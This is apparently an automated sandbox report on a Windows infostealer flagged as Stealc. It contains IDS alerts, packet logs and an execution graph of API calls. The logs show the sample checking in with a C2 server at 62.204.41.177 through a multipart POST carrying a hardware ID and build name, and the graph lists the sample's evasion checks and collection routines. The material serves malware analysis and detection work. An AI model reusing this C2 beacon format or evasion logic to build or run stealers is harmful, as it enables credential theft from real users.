RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, SetFilePointer, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CreateFileA
                                                WINHTTP.dllWinHttpOpenRequest
                                                Language of compilation systemCountry where language is spokenMap
                                                TurkishTurkey
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-10-26T19:08:39.202252+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.64971662.204.41.17780TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 26, 2024 19:08:36.972330093 CEST4971680192.168.2.662.204.41.177
                                                Oct 26, 2024 19:08:36.977893114 CEST804971662.204.41.177192.168.2.6
                                                Oct 26, 2024 19:08:36.977962017 CEST4971680192.168.2.662.204.41.177
                                                Oct 26, 2024 19:08:36.978496075 CEST4971680192.168.2.662.204.41.177
                                                Oct 26, 2024 19:08:36.983823061 CEST804971662.204.41.177192.168.2.6
                                                Oct 26, 2024 19:08:37.865935087 CEST804971662.204.41.177192.168.2.6
                                                Oct 26, 2024 19:08:37.866061926 CEST4971680192.168.2.662.204.41.177
                                                Oct 26, 2024 19:08:37.869941950 CEST4971680192.168.2.662.204.41.177
                                                Oct 26, 2024 19:08:37.875288010 CEST804971662.204.41.177192.168.2.6
                                                Oct 26, 2024 19:08:39.202084064 CEST804971662.204.41.177192.168.2.6
                                                Oct 26, 2024 19:08:39.202251911 CEST4971680192.168.2.662.204.41.177
                                                Oct 26, 2024 19:08:44.353789091 CEST804971662.204.41.177192.168.2.6
                                                Oct 26, 2024 19:08:44.353858948 CEST4971680192.168.2.662.204.41.177
                                                Oct 26, 2024 19:08:44.419879913 CEST4971680192.168.2.662.204.41.177
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 26, 2024 19:09:08.574831963 CEST5360803162.159.36.2192.168.2.6
                                                Oct 26, 2024 19:09:09.443579912 CEST6420953192.168.2.61.1.1.1
                                                Oct 26, 2024 19:09:10.441627979 CEST6420953192.168.2.61.1.1.1
                                                Oct 26, 2024 19:09:11.457240105 CEST6420953192.168.2.61.1.1.1
                                                Oct 26, 2024 19:09:13.457501888 CEST6420953192.168.2.61.1.1.1
                                                Oct 26, 2024 19:09:13.510190010 CEST53642091.1.1.1192.168.2.6
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 26, 2024 19:09:09.443579912 CEST192.168.2.61.1.1.10xbc8eStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                Oct 26, 2024 19:09:10.441627979 CEST192.168.2.61.1.1.10xbc8eStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                Oct 26, 2024 19:09:11.457240105 CEST192.168.2.61.1.1.10xbc8eStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                Oct 26, 2024 19:09:13.457501888 CEST192.168.2.61.1.1.10xbc8eStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 26, 2024 19:09:13.510190010 CEST1.1.1.1192.168.2.60xbc8eName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                • 62.204.41.177
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.64971662.204.41.177805000C:\Users\user\Desktop\1vYjXDbKHt.exe
                                                TimestampBytes transferredDirectionData
                                                Oct 26, 2024 19:08:36.978496075 CEST88OUTGET / HTTP/1.1
                                                Host: 62.204.41.177
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Oct 26, 2024 19:08:37.865935087 CEST203INHTTP/1.1 200 OK
                                                Date: Sat, 26 Oct 2024 17:08:37 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 0
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Oct 26, 2024 19:08:37.869941950 CEST418OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDB
                                                Host: 62.204.41.177
                                                Content-Length: 218
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Data Raw: 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 41 35 38 36 39 34 41 32 45 44 44 34 33 38 34 30 38 37 32 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 2d 2d 0d 0a
                                                Data Ascii: ------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="hwid"FA58694A2EDD438408725------BGIDBKKKKKFBGDGDHIDBContent-Disposition: form-data; name="build"default9_cap------BGIDBKKKKKFBGDGDHIDB--
                                                Oct 26, 2024 19:08:39.202084064 CEST210INHTTP/1.1 200 OK
                                                Date: Sat, 26 Oct 2024 17:08:38 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 8
                                                Keep-Alive: timeout=5, max=99
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 59 6d 78 76 59 32 73 3d
                                                Data Ascii: YmxvY2s=


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:13:08:30
                                                Start date:26/10/2024
                                                Path:C:\Users\user\Desktop\1vYjXDbKHt.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\1vYjXDbKHt.exe"
                                                Imagebase:0x400000
                                                File size:387'584 bytes
                                                MD5 hash:902C133812718BACF8E86A6D8BBEB22D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2279927835.000000000084A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2280002134.0000000000874000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2201257818.0000000002350000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                Reputation:low
                                                Has exited:true

                                                Target ID:5
                                                Start time:13:08:38
                                                Start date:26/10/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 1040
                                                Imagebase:0x5a0000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:6.5%
                                                  Dynamic/Decrypted Code Coverage:4.9%
                                                  Signature Coverage:12.2%
                                                  Total number of Nodes:1419
                                                  Total number of Limit Nodes:28
                                                  execution_graph 27773 409440 strlen malloc strcpy_s free std::exception::exception 27774 b40cb6 30 API calls 27775 b404b7 88 API calls 27844 41ce48 LeaveCriticalSection __initptd 27846 b36ebc VirtualProtect 27776 41b050 6 API calls 2 library calls 27815 b4cd90 173 API calls 3 library calls 27847 b432ae 22 API calls 27778 b4d0af RtlLeaveCriticalSection __initptd 27879 406f60 memcpy 27780 41dc60 atexit 27730 84aba6 27731 84abb5 27730->27731 27734 84b346 27731->27734 27740 84b361 27734->27740 27735 84b36a CreateToolhelp32Snapshot 27736 84b386 Module32First 27735->27736 27735->27740 27737 84b395 27736->27737 27738 84abbe 27736->27738 27741 84b005 27737->27741 27740->27735 27740->27736 27742 84b030 27741->27742 27743 84b041 VirtualAlloc 27742->27743 27744 84b079 27742->27744 27743->27744 27744->27744 27848 b40297 149 API calls 27880 410765 267 API calls 27849 417667 lstrcpy 27850 b4ae93 43 API calls 2 library calls 27852 41b270 5 API calls 2 library calls 27781 b43823 StrCmpCA StrCmpCA StrCmpCA strtok_s 27783 b4102b StrCmpCA strtok_s 27817 b4cd8f 6 API calls 2 library calls 27818 b4118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27785 b430f9 7 API calls 27786 41bc11 71 API calls 2 library calls 27824 b435e4 9 API calls 27825 b419e7 6 API calls 27787 b4cce9 162 API calls ___crtGetStringTypeA 27790 b430d0 9 API calls 27792 b43823 10 API calls 27793 41ac2c 71 API calls ctype 27883 b413c7 strtok_s strtok_s 27795 b4102b StrCmpCA StrCmpCA strtok_s 27797 b41c35 110 API calls 27798 4090c3 5 API calls allocator 27886 b39b37 9 API calls 27829 b41525 strtok_s strtok_s lstrlen lstrcpy codecvt 27887 41abd0 free std::exception::_Tidy ctype 27888 b3932a ??2@YAPAXI RaiseException allocator 27889 413916 88 API calls 2 library calls 27891 4183dc 15 API calls 27865 b415b3 18 API calls codecvt 27803 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27867 41ceea SetUnhandledExceptionFilter 27893 b412eb strtok_s lstrlen lstrcpy 26312 4169f0 26355 402260 26312->26355 26329 417850 3 API calls 26330 416a30 26329->26330 26331 4178e0 3 API calls 26330->26331 26332 416a43 26331->26332 26488 41a9b0 26332->26488 26334 416a64 26335 41a9b0 4 API calls 26334->26335 26336 416a6b 26335->26336 26337 41a9b0 4 API calls 26336->26337 26338 416a72 26337->26338 26339 41a9b0 4 API calls 26338->26339 26340 416a79 26339->26340 26341 41a9b0 4 API calls 26340->26341 26342 416a80 26341->26342 26496 41a8a0 26342->26496 26344 416b0c 26500 416920 GetSystemTime 26344->26500 26346 416a89 26346->26344 26348 416ac2 OpenEventA 26346->26348 26350 416af5 CloseHandle Sleep 26348->26350 26351 416ad9 26348->26351 26352 416b0a 26350->26352 26354 416ae1 CreateEventA 26351->26354 26352->26346 26353 416b16 CloseHandle ExitProcess 26354->26344 26697 4045c0 17 API calls 26355->26697 26357 402274 26358 4045c0 34 API calls 26357->26358 26359 40228d 26358->26359 26360 4045c0 34 API calls 26359->26360 26361 4022a6 26360->26361 26362 4045c0 34 API calls 26361->26362 26363 4022bf 26362->26363 26364 4045c0 34 API calls 26363->26364 26365 4022d8 26364->26365 26366 4045c0 34 API calls 26365->26366 26367 4022f1 26366->26367 26368 4045c0 34 API calls 26367->26368 26369 40230a 26368->26369 26370 4045c0 34 API calls 26369->26370 26371 402323 26370->26371 26372 4045c0 34 API calls 26371->26372 26373 40233c 26372->26373 26374 4045c0 34 API calls 26373->26374 26375 402355 26374->26375 26376 4045c0 34 API calls 26375->26376 26377 40236e 26376->26377 26378 4045c0 34 API calls 26377->26378 26379 402387 26378->26379 26380 4045c0 34 API calls 26379->26380 26381 4023a0 26380->26381 26382 4045c0 34 API calls 26381->26382 26383 4023b9 26382->26383 26384 4045c0 34 API calls 26383->26384 26385 4023d2 26384->26385 26386 4045c0 34 API calls 26385->26386 26387 4023eb 26386->26387 26388 4045c0 34 API calls 26387->26388 26389 402404 26388->26389 26390 4045c0 34 API calls 26389->26390 26391 40241d 26390->26391 26392 4045c0 34 API calls 26391->26392 26393 402436 26392->26393 26394 4045c0 34 API calls 26393->26394 26395 40244f 26394->26395 26396 4045c0 34 API calls 26395->26396 26397 402468 26396->26397 26398 4045c0 34 API calls 26397->26398 26399 402481 26398->26399 26400 4045c0 34 API calls 26399->26400 26401 40249a 26400->26401 26402 4045c0 34 API calls 26401->26402 26403 4024b3 26402->26403 26404 4045c0 34 API calls 26403->26404 26405 4024cc 26404->26405 26406 4045c0 34 API calls 26405->26406 26407 4024e5 26406->26407 26408 4045c0 34 API calls 26407->26408 26409 4024fe 26408->26409 26410 4045c0 34 API calls 26409->26410 26411 402517 26410->26411 26412 4045c0 34 API calls 26411->26412 26413 402530 26412->26413 26414 4045c0 34 API calls 26413->26414 26415 402549 26414->26415 26416 4045c0 34 API calls 26415->26416 26417 402562 26416->26417 26418 4045c0 34 API calls 26417->26418 26419 40257b 26418->26419 26420 4045c0 34 API calls 26419->26420 26421 402594 26420->26421 26422 4045c0 34 API calls 26421->26422 26423 4025ad 26422->26423 26424 4045c0 34 API calls 26423->26424 26425 4025c6 26424->26425 26426 4045c0 34 API calls 26425->26426 26427 4025df 26426->26427 26428 4045c0 34 API calls 26427->26428 26429 4025f8 26428->26429 26430 4045c0 34 API calls 26429->26430 26431 402611 26430->26431 26432 4045c0 34 API calls 26431->26432 26433 40262a 26432->26433 26434 4045c0 34 API calls 26433->26434 26435 402643 26434->26435 26436 4045c0 34 API calls 26435->26436 26437 40265c 26436->26437 26438 4045c0 34 API calls 26437->26438 26439 402675 26438->26439 26440 4045c0 34 API calls 26439->26440 26441 40268e 26440->26441 26442 419860 26441->26442 26701 419750 GetPEB 26442->26701 26444 419868 26445 419a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26444->26445 26446 41987a 26444->26446 26447 419af4 GetProcAddress 26445->26447 26448 419b0d 26445->26448 26449 41988c 21 API calls 26446->26449 26447->26448 26450 419b46 26448->26450 26451 419b16 GetProcAddress GetProcAddress 26448->26451 26449->26445 26452 419b68 26450->26452 26453 419b4f GetProcAddress 26450->26453 26451->26450 26454 419b71 GetProcAddress 26452->26454 26455 419b89 26452->26455 26453->26452 26454->26455 26456 416a00 26455->26456 26457 419b92 GetProcAddress GetProcAddress 26455->26457 26458 41a740 26456->26458 26457->26456 26459 41a750 26458->26459 26460 416a0d 26459->26460 26461 41a77e lstrcpy 26459->26461 26462 4011d0 26460->26462 26461->26460 26463 4011e8 26462->26463 26464 401217 26463->26464 26465 40120f ExitProcess 26463->26465 26466 401160 GetSystemInfo 26464->26466 26467 401184 26466->26467 26468 40117c ExitProcess 26466->26468 26469 401110 GetCurrentProcess VirtualAllocExNuma 26467->26469 26470 401141 ExitProcess 26469->26470 26471 401149 26469->26471 26702 4010a0 VirtualAlloc 26471->26702 26474 401220 26706 4189b0 26474->26706 26477 401249 __aulldiv 26478 40129a 26477->26478 26479 401292 ExitProcess 26477->26479 26480 416770 GetUserDefaultLangID 26478->26480 26481 4167d3 GetUserDefaultLCID 26480->26481 26482 416792 26480->26482 26481->26329 26482->26481 26483 4167c1 ExitProcess 26482->26483 26484 4167a3 ExitProcess 26482->26484 26485 4167b7 ExitProcess 26482->26485 26486 4167cb ExitProcess 26482->26486 26487 4167ad ExitProcess 26482->26487 26708 41a710 26488->26708 26490 41a9c1 lstrlenA 26492 41a9e0 26490->26492 26491 41aa18 26709 41a7a0 26491->26709 26492->26491 26494 41a9fa lstrcpy lstrcatA 26492->26494 26494->26491 26495 41aa24 26495->26334 26497 41a8bb 26496->26497 26498 41a90b 26497->26498 26499 41a8f9 lstrcpy 26497->26499 26498->26346 26499->26498 26713 416820 26500->26713 26502 41698e 26503 416998 sscanf 26502->26503 26742 41a800 26503->26742 26505 4169aa SystemTimeToFileTime SystemTimeToFileTime 26506 4169e0 26505->26506 26507 4169ce 26505->26507 26509 415b10 26506->26509 26507->26506 26508 4169d8 ExitProcess 26507->26508 26510 415b1d 26509->26510 26511 41a740 lstrcpy 26510->26511 26512 415b2e 26511->26512 26744 41a820 lstrlenA 26512->26744 26515 41a820 2 API calls 26516 415b64 26515->26516 26517 41a820 2 API calls 26516->26517 26518 415b74 26517->26518 26748 416430 26518->26748 26521 41a820 2 API calls 26522 415b93 26521->26522 26523 41a820 2 API calls 26522->26523 26524 415ba0 26523->26524 26525 41a820 2 API calls 26524->26525 26526 415bad 26525->26526 26527 41a820 2 API calls 26526->26527 26528 415bf9 26527->26528 26757 4026a0 26528->26757 26536 415cc3 26537 416430 lstrcpy 26536->26537 26538 415cd5 26537->26538 26539 41a7a0 lstrcpy 26538->26539 26540 415cf2 26539->26540 26541 41a9b0 4 API calls 26540->26541 26542 415d0a 26541->26542 26543 41a8a0 lstrcpy 26542->26543 26544 415d16 26543->26544 26545 41a9b0 4 API calls 26544->26545 26546 415d3a 26545->26546 26547 41a8a0 lstrcpy 26546->26547 26548 415d46 26547->26548 26549 41a9b0 4 API calls 26548->26549 26550 415d6a 26549->26550 26551 41a8a0 lstrcpy 26550->26551 26552 415d76 26551->26552 26553 41a740 lstrcpy 26552->26553 26554 415d9e 26553->26554 27483 417500 GetWindowsDirectoryA 26554->27483 26557 41a7a0 lstrcpy 26558 415db8 26557->26558 27493 404880 26558->27493 26560 415dbe 27639 4117a0 26560->27639 26562 415dc6 26563 41a740 lstrcpy 26562->26563 26564 415de9 26563->26564 26565 401590 lstrcpy 26564->26565 26566 415dfd 26565->26566 27659 405960 39 API calls ctype 26566->27659 26568 415e03 27660 411050 strtok_s strtok_s lstrlenA lstrcpy 26568->27660 26570 415e0e 26571 41a740 lstrcpy 26570->26571 26572 415e32 26571->26572 26573 401590 lstrcpy 26572->26573 26574 415e46 26573->26574 27661 405960 39 API calls ctype 26574->27661 26576 415e4c 27662 410d90 7 API calls 26576->27662 26578 415e57 26579 41a740 lstrcpy 26578->26579 26580 415e79 26579->26580 26581 401590 lstrcpy 26580->26581 26582 415e8d 26581->26582 27663 405960 39 API calls ctype 26582->27663 26584 415e93 27664 410f40 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26584->27664 26586 415e9e 26587 401590 lstrcpy 26586->26587 26588 415eb5 26587->26588 27665 411a10 121 API calls 26588->27665 26590 415eba 26591 41a740 lstrcpy 26590->26591 26592 415ed6 26591->26592 27666 404fb0 8 API calls 26592->27666 26594 415edb 26595 401590 lstrcpy 26594->26595 26596 415f5b 26595->26596 27667 410740 280 API calls 26596->27667 26598 415f60 26599 41a740 lstrcpy 26598->26599 26600 415f86 26599->26600 26601 401590 lstrcpy 26600->26601 26602 415f9a 26601->26602 27668 405960 39 API calls ctype 26602->27668 26604 415fa0 27669 411170 strtok_s StrCmpCA strtok_s lstrlenA lstrcpy 26604->27669 26606 415fab 26607 401590 lstrcpy 26606->26607 26608 415feb 26607->26608 27670 401e80 65 API calls 26608->27670 26610 415ff0 26611 416000 26610->26611 26612 416092 26610->26612 26613 41a740 lstrcpy 26611->26613 26614 41a7a0 lstrcpy 26612->26614 26615 416020 26613->26615 26616 4160a5 26614->26616 26617 401590 lstrcpy 26615->26617 26618 401590 lstrcpy 26616->26618 26620 416034 26617->26620 26619 4160b9 26618->26619 27674 405960 39 API calls ctype 26619->27674 27671 405960 39 API calls ctype 26620->27671 26623 4160bf 27675 413560 36 API calls 26623->27675 26624 41603a 27672 4112d0 21 API calls ctype 26624->27672 26627 41608a 26631 401590 lstrcpy 26627->26631 26666 41610b 26627->26666 26628 416045 26629 401590 lstrcpy 26628->26629 26630 416085 26629->26630 27673 413dc0 73 API calls 26630->27673 26634 4160e7 26631->26634 26633 401590 lstrcpy 26635 41612b 26633->26635 27676 4140b0 62 API calls ctype 26634->27676 27678 414780 114 API calls ctype 26635->27678 26636 401590 lstrcpy 26639 416150 26636->26639 27679 414bb0 65 API calls ctype 26639->27679 26640 4160ec 26647 401590 lstrcpy 26640->26647 26641 401590 lstrcpy 26648 416175 26641->26648 26642 401590 lstrcpy 26649 41619a 26642->26649 26643 416130 26643->26636 26651 416155 26643->26651 26644 41619f 26645 4161c4 26644->26645 26650 401590 lstrcpy 26644->26650 26653 4161e9 26645->26653 26660 401590 lstrcpy 26645->26660 26652 416106 26647->26652 27680 414d70 73 API calls 26648->27680 27681 414f40 67 API calls ctype 26649->27681 26658 4161bf 26650->26658 26651->26641 26655 41617a 26651->26655 27677 415100 71 API calls 26652->27677 26656 416210 26653->26656 26662 401590 lstrcpy 26653->26662 26655->26642 26655->26644 26663 416220 26656->26663 26664 4162b3 26656->26664 27682 407710 125 API calls ctype 26658->27682 26661 4161e4 26660->26661 27683 415050 65 API calls ctype 26661->27683 26668 416209 26662->26668 26670 41a740 lstrcpy 26663->26670 26669 41a7a0 lstrcpy 26664->26669 26666->26633 26666->26643 27684 419010 54 API calls ctype 26668->27684 26672 4162c6 26669->26672 26673 416241 26670->26673 26674 401590 lstrcpy 26672->26674 26675 401590 lstrcpy 26673->26675 26676 4162da 26674->26676 26677 416255 26675->26677 27688 405960 39 API calls ctype 26676->27688 27685 405960 39 API calls ctype 26677->27685 26680 41625b 27686 4112d0 21 API calls ctype 26680->27686 26681 4162e0 27689 413560 36 API calls 26681->27689 26684 416266 26686 401590 lstrcpy 26684->26686 26685 4162ab 26687 41a7a0 lstrcpy 26685->26687 26688 4162a6 26686->26688 26689 4162fc 26687->26689 27687 413dc0 73 API calls 26688->27687 26691 401590 lstrcpy 26689->26691 26692 416310 26691->26692 27690 405960 39 API calls ctype 26692->27690 26694 41631c 26696 416338 26694->26696 27691 416630 9 API calls ctype 26694->27691 26696->26353 26700 404697 26697->26700 26698 4046ac 11 API calls 26698->26700 26699 40474f 6 API calls 26699->26357 26700->26698 26700->26699 26701->26444 26704 4010c2 ctype 26702->26704 26703 4010fd 26703->26474 26704->26703 26705 4010e2 VirtualFree 26704->26705 26705->26703 26707 401233 GlobalMemoryStatusEx 26706->26707 26707->26477 26708->26490 26710 41a7c2 26709->26710 26711 41a7ec 26710->26711 26712 41a7da lstrcpy 26710->26712 26711->26495 26712->26711 26714 41a740 lstrcpy 26713->26714 26715 416833 26714->26715 26716 41a9b0 4 API calls 26715->26716 26717 416845 26716->26717 26718 41a8a0 lstrcpy 26717->26718 26719 41684e 26718->26719 26720 41a9b0 4 API calls 26719->26720 26721 416867 26720->26721 26722 41a8a0 lstrcpy 26721->26722 26723 416870 26722->26723 26724 41a9b0 4 API calls 26723->26724 26725 41688a 26724->26725 26726 41a8a0 lstrcpy 26725->26726 26727 416893 26726->26727 26728 41a9b0 4 API calls 26727->26728 26729 4168ac 26728->26729 26730 41a8a0 lstrcpy 26729->26730 26731 4168b5 26730->26731 26732 41a9b0 4 API calls 26731->26732 26733 4168cf 26732->26733 26734 41a8a0 lstrcpy 26733->26734 26735 4168d8 26734->26735 26736 41a9b0 4 API calls 26735->26736 26737 4168f3 26736->26737 26738 41a8a0 lstrcpy 26737->26738 26739 4168fc 26738->26739 26740 41a7a0 lstrcpy 26739->26740 26741 416910 26740->26741 26741->26502 26743 41a812 26742->26743 26743->26505 26745 41a83f 26744->26745 26746 415b54 26745->26746 26747 41a87b lstrcpy 26745->26747 26746->26515 26747->26746 26749 41a8a0 lstrcpy 26748->26749 26750 416443 26749->26750 26751 41a8a0 lstrcpy 26750->26751 26752 416455 26751->26752 26753 41a8a0 lstrcpy 26752->26753 26754 416467 26753->26754 26755 41a8a0 lstrcpy 26754->26755 26756 415b86 26755->26756 26756->26521 26758 4045c0 34 API calls 26757->26758 26759 4026b4 26758->26759 26760 4045c0 34 API calls 26759->26760 26761 4026d7 26760->26761 26762 4045c0 34 API calls 26761->26762 26763 4026f0 26762->26763 26764 4045c0 34 API calls 26763->26764 26765 402709 26764->26765 26766 4045c0 34 API calls 26765->26766 26767 402736 26766->26767 26768 4045c0 34 API calls 26767->26768 26769 40274f 26768->26769 26770 4045c0 34 API calls 26769->26770 26771 402768 26770->26771 26772 4045c0 34 API calls 26771->26772 26773 402795 26772->26773 26774 4045c0 34 API calls 26773->26774 26775 4027ae 26774->26775 26776 4045c0 34 API calls 26775->26776 26777 4027c7 26776->26777 26778 4045c0 34 API calls 26777->26778 26779 4027e0 26778->26779 26780 4045c0 34 API calls 26779->26780 26781 4027f9 26780->26781 26782 4045c0 34 API calls 26781->26782 26783 402812 26782->26783 26784 4045c0 34 API calls 26783->26784 26785 40282b 26784->26785 26786 4045c0 34 API calls 26785->26786 26787 402844 26786->26787 26788 4045c0 34 API calls 26787->26788 26789 40285d 26788->26789 26790 4045c0 34 API calls 26789->26790 26791 402876 26790->26791 26792 4045c0 34 API calls 26791->26792 26793 40288f 26792->26793 26794 4045c0 34 API calls 26793->26794 26795 4028a8 26794->26795 26796 4045c0 34 API calls 26795->26796 26797 4028c1 26796->26797 26798 4045c0 34 API calls 26797->26798 26799 4028da 26798->26799 26800 4045c0 34 API calls 26799->26800 26801 4028f3 26800->26801 26802 4045c0 34 API calls 26801->26802 26803 40290c 26802->26803 26804 4045c0 34 API calls 26803->26804 26805 402925 26804->26805 26806 4045c0 34 API calls 26805->26806 26807 40293e 26806->26807 26808 4045c0 34 API calls 26807->26808 26809 402957 26808->26809 26810 4045c0 34 API calls 26809->26810 26811 402970 26810->26811 26812 4045c0 34 API calls 26811->26812 26813 402989 26812->26813 26814 4045c0 34 API calls 26813->26814 26815 4029a2 26814->26815 26816 4045c0 34 API calls 26815->26816 26817 4029bb 26816->26817 26818 4045c0 34 API calls 26817->26818 26819 4029d4 26818->26819 26820 4045c0 34 API calls 26819->26820 26821 4029ed 26820->26821 26822 4045c0 34 API calls 26821->26822 26823 402a06 26822->26823 26824 4045c0 34 API calls 26823->26824 26825 402a1f 26824->26825 26826 4045c0 34 API calls 26825->26826 26827 402a38 26826->26827 26828 4045c0 34 API calls 26827->26828 26829 402a51 26828->26829 26830 4045c0 34 API calls 26829->26830 26831 402a6a 26830->26831 26832 4045c0 34 API calls 26831->26832 26833 402a83 26832->26833 26834 4045c0 34 API calls 26833->26834 26835 402a9c 26834->26835 26836 4045c0 34 API calls 26835->26836 26837 402ab5 26836->26837 26838 4045c0 34 API calls 26837->26838 26839 402ace 26838->26839 26840 4045c0 34 API calls 26839->26840 26841 402ae7 26840->26841 26842 4045c0 34 API calls 26841->26842 26843 402b00 26842->26843 26844 4045c0 34 API calls 26843->26844 26845 402b19 26844->26845 26846 4045c0 34 API calls 26845->26846 26847 402b32 26846->26847 26848 4045c0 34 API calls 26847->26848 26849 402b4b 26848->26849 26850 4045c0 34 API calls 26849->26850 26851 402b64 26850->26851 26852 4045c0 34 API calls 26851->26852 26853 402b7d 26852->26853 26854 4045c0 34 API calls 26853->26854 26855 402b96 26854->26855 26856 4045c0 34 API calls 26855->26856 26857 402baf 26856->26857 26858 4045c0 34 API calls 26857->26858 26859 402bc8 26858->26859 26860 4045c0 34 API calls 26859->26860 26861 402be1 26860->26861 26862 4045c0 34 API calls 26861->26862 26863 402bfa 26862->26863 26864 4045c0 34 API calls 26863->26864 26865 402c13 26864->26865 26866 4045c0 34 API calls 26865->26866 26867 402c2c 26866->26867 26868 4045c0 34 API calls 26867->26868 26869 402c45 26868->26869 26870 4045c0 34 API calls 26869->26870 26871 402c5e 26870->26871 26872 4045c0 34 API calls 26871->26872 26873 402c77 26872->26873 26874 4045c0 34 API calls 26873->26874 26875 402c90 26874->26875 26876 4045c0 34 API calls 26875->26876 26877 402ca9 26876->26877 26878 4045c0 34 API calls 26877->26878 26879 402cc2 26878->26879 26880 4045c0 34 API calls 26879->26880 26881 402cdb 26880->26881 26882 4045c0 34 API calls 26881->26882 26883 402cf4 26882->26883 26884 4045c0 34 API calls 26883->26884 26885 402d0d 26884->26885 26886 4045c0 34 API calls 26885->26886 26887 402d26 26886->26887 26888 4045c0 34 API calls 26887->26888 26889 402d3f 26888->26889 26890 4045c0 34 API calls 26889->26890 26891 402d58 26890->26891 26892 4045c0 34 API calls 26891->26892 26893 402d71 26892->26893 26894 4045c0 34 API calls 26893->26894 26895 402d8a 26894->26895 26896 4045c0 34 API calls 26895->26896 26897 402da3 26896->26897 26898 4045c0 34 API calls 26897->26898 26899 402dbc 26898->26899 26900 4045c0 34 API calls 26899->26900 26901 402dd5 26900->26901 26902 4045c0 34 API calls 26901->26902 26903 402dee 26902->26903 26904 4045c0 34 API calls 26903->26904 26905 402e07 26904->26905 26906 4045c0 34 API calls 26905->26906 26907 402e20 26906->26907 26908 4045c0 34 API calls 26907->26908 26909 402e39 26908->26909 26910 4045c0 34 API calls 26909->26910 26911 402e52 26910->26911 26912 4045c0 34 API calls 26911->26912 26913 402e6b 26912->26913 26914 4045c0 34 API calls 26913->26914 26915 402e84 26914->26915 26916 4045c0 34 API calls 26915->26916 26917 402e9d 26916->26917 26918 4045c0 34 API calls 26917->26918 26919 402eb6 26918->26919 26920 4045c0 34 API calls 26919->26920 26921 402ecf 26920->26921 26922 4045c0 34 API calls 26921->26922 26923 402ee8 26922->26923 26924 4045c0 34 API calls 26923->26924 26925 402f01 26924->26925 26926 4045c0 34 API calls 26925->26926 26927 402f1a 26926->26927 26928 4045c0 34 API calls 